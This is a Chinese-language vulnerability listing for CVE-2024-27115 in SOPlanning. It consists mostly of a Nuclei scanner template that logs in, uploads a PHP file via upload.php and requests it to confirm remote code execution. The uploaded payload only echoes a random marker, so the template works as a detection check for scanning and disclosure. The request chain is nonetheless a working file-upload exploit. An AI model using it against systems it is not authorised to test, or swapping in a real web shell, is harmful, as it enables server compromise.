CVE-2024-27115: SOPlanning - Remote Code Execution

日期: 2025-08-01 | 影响软件: SOPlanning | POC: 已公开

漏洞描述

Detects a remote code execution vulnerability in SOPlanning version 1.52.01 through authenticated PHP file upload.

PoC代码[已公开]

id: CVE-2024-27115

info:
  name: SOPlanning - Remote Code Execution
  author: soonghee2@ajou.ac.kr
  severity: high
  description: |
    Detects a remote code execution vulnerability in SOPlanning version 1.52.01 through authenticated PHP file upload.
  reference: |
    - https://www.exploit-db.com/exploits/52082
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27115
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/S:N/AU:Y/R:I/V:C/RE:M/U:Red
    cvss-score: 10.0
    cve-id: CVE-2024-27115
    cwe-id: CWE-434
    epss-score: 0.78519
    epss-percentile: 0.99004
    cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*
  tags: cve,cve2024,soplanning,rce,authenticated,file-upload,intrusive

variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /process/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        login={{username}}&password={{password}}

      - |
        POST /process/upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=0ccdfeede39eb97743b39d87536933e1

        --0ccdfeede39eb97743b39d87536933e1
        Content-Disposition: form-data; name="linkid"

        soonghee
        --0ccdfeede39eb97743b39d87536933e1
        Content-Disposition: form-data; name="periodeid"

        0
        --0ccdfeede39eb97743b39d87536933e1
        Content-Disposition: form-data; name="fichiers"

        {{randstr}}.php
        --0ccdfeede39eb97743b39d87536933e1
        Content-Disposition: form-data; name="type"

        upload
        --0ccdfeede39eb97743b39d87536933e1
        Content-Disposition: form-data; name="fichier-0"; filename="{{filename}}.php"
        Content-Type: application/x-php

        <?php echo '{{randstr}}'; ?>
        --0ccdfeede39eb97743b39d87536933e1--

      - |
        GET /upload/files/soonghee/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '{{randstr}}'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207bc68d7259872ffedc52d483775de244cadad855dd77972ed45066d1dd0c1f320221009e923fdb25e56bf4dfe7690d174342e869537f041f0b421d9f0aa22458e37422:922c64590222798bb761d5b6d8e72950

相关漏洞推荐